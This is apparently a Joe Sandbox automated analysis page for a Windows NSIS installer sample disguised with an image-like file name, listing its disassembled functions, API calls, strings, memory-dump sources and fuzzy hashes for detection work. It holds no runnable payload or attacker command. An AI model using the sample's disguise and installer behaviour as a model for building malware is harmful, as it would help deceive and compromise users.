                                        • String ID: %s=%s$[Rename]
                                        • API String ID: 2171350718-1727408572
                                        • Opcode ID: 569be3a98da05520ad95d37df462ccc6378b119762144e883bf0616c118c920a
                                        • Instruction ID: da8ce3bfdf00fcfed17b5edaf8d9799a0bf0ff3a482d4f6cc2fc7d52a36fe9c3
                                        • Opcode Fuzzy Hash: 569be3a98da05520ad95d37df462ccc6378b119762144e883bf0616c118c920a
                                        • Instruction Fuzzy Hash: 3D3135312407117BC220AB65AC88F6B3A5CDF41758F16003BFA02F72D2DE7C98558ABD
                                        Function 00406587 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                        Download Yara Rule
                                        APIs
                                        • CharNextA.USER32(0000000C,*?|<>/":,00000000,?,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065DF
                                        • CharNextA.USER32(0000000C,0000000C,0000000C,00000000,?,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065EC
                                        • CharNextA.USER32(0000000C,?,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065F1
                                        • CharPrevA.USER32(0000000C,0000000C,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00406601
                                        Strings
                                        • "C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe", xrefs: 00406587
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00406588
                                        • *?|<>/":, xrefs: 004065CF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Char$Next$Prev
                                        • String ID: "C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 589700163-3907812296
                                        • Opcode ID: 5d1a13f5f6d1e26a5c928a636a6cd85ce9cfe8cb66a926baf99f252f8cb630c3
                                        • Instruction ID: 9f335943bb0e62a209881404c60ffb6aa99012b8199ff17f999404b9432e9d26
                                        • Opcode Fuzzy Hash: 5d1a13f5f6d1e26a5c928a636a6cd85ce9cfe8cb66a926baf99f252f8cb630c3
                                        • Instruction Fuzzy Hash: 871104618053923DFB3216282C44B777F894F97760F1A007FE5C2722C6CA7C5C62966D
                                        Function 00404394 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowLongA.USER32(?,000000EB), ref: 004043B1
                                        • GetSysColor.USER32(00000000), ref: 004043EF
                                        • SetTextColor.GDI32(?,00000000), ref: 004043FB
                                        • SetBkMode.GDI32(?,?), ref: 00404407
                                        • GetSysColor.USER32(?), ref: 0040441A
                                        • SetBkColor.GDI32(?,?), ref: 0040442A
                                        • DeleteObject.GDI32(?), ref: 00404444
                                        • CreateBrushIndirect.GDI32(?), ref: 0040444E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                        • String ID:
                                        • API String ID: 2320649405-0
                                        • Opcode ID: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
                                        • Instruction ID: 0cb6da092899fbd89936ee00678fc1211e2f1892718b1dfe439ae8b372ce6297
                                        • Opcode Fuzzy Hash: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
                                        • Instruction Fuzzy Hash: E32177715007049BCF309F78D948B577BF8AF81714B04893DEAA6B26E1C734E948CB58
                                        Function 6E332568 Relevance: 10.6, APIs: 7, Instructions: 124COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 6E3312A5: GlobalAlloc.KERNEL32(00000040,6E3312C3,?,6E33135F,-6E33504B,6E3311C0,-000000A0), ref: 6E3312AD
                                        • GlobalFree.KERNEL32(?), ref: 6E33266E
                                        • GlobalFree.KERNEL32(00000000), ref: 6E3326A8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2088083079.000000006E331000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E330000, based on PE: true
                                        • Associated: 00000000.00000002.2088011783.000000006E330000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000000.00000002.2088098769.000000006E334000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000000.00000002.2088118015.000000006E336000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e330000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Global$Free$Alloc
                                        • String ID:
                                        • API String ID: 1780285237-0
                                        • Opcode ID: aca5422771294a2e1036fb03e742c7feb447de5c784a973711a5aeb0ce06efdb
                                        • Instruction ID: 54450067e11ce11a8faaf95cede9cdd3485276710862e85872462c5c2fa7a1eb
                                        • Opcode Fuzzy Hash: aca5422771294a2e1036fb03e742c7feb447de5c784a973711a5aeb0ce06efdb
                                        • Instruction Fuzzy Hash: B941C0716086D5EFDB118F94DE94C6AB7BEFF86304B314969F54087210C7769C09CBA1
                                        Function 00404C80 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404C9B
                                        • GetMessagePos.USER32 ref: 00404CA3
                                        • ScreenToClient.USER32(?,?), ref: 00404CBD
                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404CCF
                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404CF5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Message$Send$ClientScreen
                                        • String ID: f
                                        • API String ID: 41195575-1993550816
                                        • Opcode ID: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
                                        • Instruction ID: 8ac1eb656b69e247d5f05692bef4687e0c0d70a1275d834663b2b8f38aac2a1a
                                        • Opcode Fuzzy Hash: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
                                        • Instruction Fuzzy Hash: B6019E71900218BAEB00DB94DD81FFFBBBCAF44711F10012BBA01B61C0C7B899418BA4
                                        Function 00402E4A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E65
                                        • MulDiv.KERNEL32(000B2A08,00000064,000B2A0C), ref: 00402E90
                                        • wsprintfA.USER32 ref: 00402EA0
                                        • SetWindowTextA.USER32(?,?), ref: 00402EB0
                                        • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402EC2
                                        Strings
                                        • verifying installer: %d%%, xrefs: 00402E9A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Text$ItemTimerWindowwsprintf
                                        • String ID: verifying installer: %d%%
                                        • API String ID: 1451636040-82062127
                                        • Opcode ID: 008e47a76e30b834da19422bd6ea308201e4826492d01be12a9765c28616dd6c
                                        • Instruction ID: 08bf30aeaad7c3c0f985f8b81484beb4ade113f1463dbf8d033ac048ea6a4a00
                                        • Opcode Fuzzy Hash: 008e47a76e30b834da19422bd6ea308201e4826492d01be12a9765c28616dd6c
                                        • Instruction Fuzzy Hash: EF016270640208FBEF209F60DE09EEE3769AB10304F008039FA06B51E1DBB89D56CF99
                                        Function 6E332381 Relevance: 9.1, APIs: 6, Instructions: 140memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GlobalFree.KERNEL32(00000000), ref: 6E3324D7
                                          • Part of subcall function 6E3312B4: lstrcpynA.KERNEL32(00000000,?,6E33135F,-6E33504B,6E3311C0,-000000A0), ref: 6E3312C4
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 6E332452
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 6E332467
                                        • GlobalAlloc.KERNEL32(00000040,00000010), ref: 6E332478
                                        • CLSIDFromString.OLE32(00000000,00000000), ref: 6E332486
                                        • GlobalFree.KERNEL32(00000000), ref: 6E33248D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2088083079.000000006E331000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E330000, based on PE: true
                                        • Associated: 00000000.00000002.2088011783.000000006E330000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000000.00000002.2088098769.000000006E334000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000000.00000002.2088118015.000000006E336000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e330000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                        • String ID:
                                        • API String ID: 3730416702-0
                                        • Opcode ID: a10f79709475f75dc8293d47663b953e50b66edd1ffe92d967b64a05286aab27
                                        • Instruction ID: e8a0a02fecd06f57a166540b0b9f6712a80b9509380207d1da88f06a2aeb7a69
                                        • Opcode Fuzzy Hash: a10f79709475f75dc8293d47663b953e50b66edd1ffe92d967b64a05286aab27
                                        • Instruction Fuzzy Hash: 9141DFB15083A1EFD7209FA59A40F6AB3FCFB41321F30895AE545CB581D7719848CBE1
                                        Function 0040280D Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 0040286E
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040288A
                                        • GlobalFree.KERNEL32(?), ref: 004028C9
                                        • GlobalFree.KERNEL32(00000000), ref: 004028DC
                                        • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004028F8
                                        • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 0040290B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                        • String ID:
                                        • API String ID: 2667972263-0
                                        • Opcode ID: f2f5004db618060fe317ee0d1003544e1a2fa323f5e59acd3a511c365c814511
                                        • Instruction ID: f5f6ffd272893f167dd8362f30c9a288e23aa0477cfe19fc00766ec7197ba147
                                        • Opcode Fuzzy Hash: f2f5004db618060fe317ee0d1003544e1a2fa323f5e59acd3a511c365c814511
                                        • Instruction Fuzzy Hash: EA319E32C00124BBEF216FA5CE48D9E7A79EF04364F10823AF554B72E1CB7949419FA8
                                        Function 6E3318C7 Relevance: 7.7, APIs: 5, Instructions: 194COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2088083079.000000006E331000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E330000, based on PE: true
                                        • Associated: 00000000.00000002.2088011783.000000006E330000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000000.00000002.2088098769.000000006E334000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000000.00000002.2088118015.000000006E336000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e330000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: FreeGlobal
                                        • String ID:
                                        • API String ID: 2979337801-0
                                        • Opcode ID: 313cc75bc5cb4defdd71d2434965b61503c6e200aca8aff80ecdd4e946ce39e5
                                        • Instruction ID: a3fe46814e2d06911c91349e486ae4646317809226ae8a83e246974b0602189e
                                        • Opcode Fuzzy Hash: 313cc75bc5cb4defdd71d2434965b61503c6e200aca8aff80ecdd4e946ce39e5
                                        • Instruction Fuzzy Hash: DE51E632D141FAAEDB508FF98540DBDBBB9AF46356F30456AE450A3104C632DA8987A1
                                        Function 00402D60 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402DB4
                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402E00
                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E09
                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402E20
                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E2B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: CloseEnum$DeleteValue
                                        • String ID:
                                        • API String ID: 1354259210-0
                                        • Opcode ID: 4661eebe429a67a82503d6c58fda4df65fcd6975792f18fdfa4e9bc5c49253fc
                                        • Instruction ID: 6dce0a33df475c695949d28520f5422678f12aee2cc84e9e423a55bf09ef2c56
                                        • Opcode Fuzzy Hash: 4661eebe429a67a82503d6c58fda4df65fcd6975792f18fdfa4e9bc5c49253fc
                                        • Instruction Fuzzy Hash: 3B215C7250010CBBDF129F90CE89EEF7B6DEB44344F100076FA15B11A0E7B48F54AAA8
                                        Function 00401D8A Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,?), ref: 00401DA3
                                        • GetClientRect.USER32(?,?), ref: 00401DF1
                                        • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401E21
                                        • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E35
                                        • DeleteObject.GDI32(00000000), ref: 00401E45
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                        • String ID:
                                        • API String ID: 1849352358-0
                                        • Opcode ID: e1d6a9ee3c5b7c1e8a311aee8a429abf799163a7f8b121a70cc01e31e7316f78
                                        • Instruction ID: fce380eb4141a570f491a0e518fb8aa8e4aa376f46a8457bbd9b5af61eb39f7b
                                        • Opcode Fuzzy Hash: e1d6a9ee3c5b7c1e8a311aee8a429abf799163a7f8b121a70cc01e31e7316f78
                                        • Instruction Fuzzy Hash: AE210A72E00509AFDF15DF94DD45AAEBBB6FB48300F10407AF505F62A1CB389941DB58
                                        Function 00401E5A Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDC.USER32(?), ref: 00401E5D
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E77
                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E7F
                                        • ReleaseDC.USER32(?,00000000), ref: 00401E90
                                        • CreateFontIndirectA.GDI32(0040B830), ref: 00401EDF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                        • String ID:
                                        • API String ID: 3808545654-0
                                        • Opcode ID: 0466c2d66d8f018793a5193256bc33b363c7409b941099693a26df1913abae86
                                        • Instruction ID: 3235dfa2473664f3223cdf9cba53c0ab50ba273bd9661b34cbd5463b8b999ac8
                                        • Opcode Fuzzy Hash: 0466c2d66d8f018793a5193256bc33b363c7409b941099693a26df1913abae86
                                        • Instruction Fuzzy Hash: FE017572504344AFE7107B60AE49B9E3FF8E715701F10897AF181B62F2CB7800058B6D
                                        Function 00404B76 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlenA.KERNEL32(0042A488,0042A488,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A91,000000DF,00000000,00000400,?), ref: 00404C14
                                        • wsprintfA.USER32 ref: 00404C1C
                                        • SetDlgItemTextA.USER32(?,0042A488), ref: 00404C2F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: ItemTextlstrlenwsprintf
                                        • String ID: %u.%u%s%s
                                        • API String ID: 3540041739-3551169577
                                        • Opcode ID: 27895e53cc41a390800bf12e600d2f981ced9c779fa51419b0a61958e7e4186c
                                        • Instruction ID: 5f9a4297b7b6a3636d8a8bee3f83e4b2b5f26aab9c0b753bab98504590b6652f
                                        • Opcode Fuzzy Hash: 27895e53cc41a390800bf12e600d2f981ced9c779fa51419b0a61958e7e4186c
                                        • Instruction Fuzzy Hash: BE110A73A041243BEB0065AD9C45FAE3698DB85374F250237FE26F61D1EA78DC1281E9
                                        Function 00405D0D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040628D: lstrcpynA.KERNEL32(0000000C,0000000C,00000400,0040357B,0042E820,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040629A
                                          • Part of subcall function 00405CB8: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,0000000C,00405D24,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,74DF3410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"), ref: 00405CC6
                                          • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CCB
                                          • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CDF
                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb535E.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,74DF3410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"), ref: 00405D60
                                        • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb535E.tmp,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,74DF3410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,74DF3410,C:\Users\user\AppData\Local\Temp\), ref: 00405D70
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsb535E.tmp
                                        • API String ID: 3248276644-2198462938
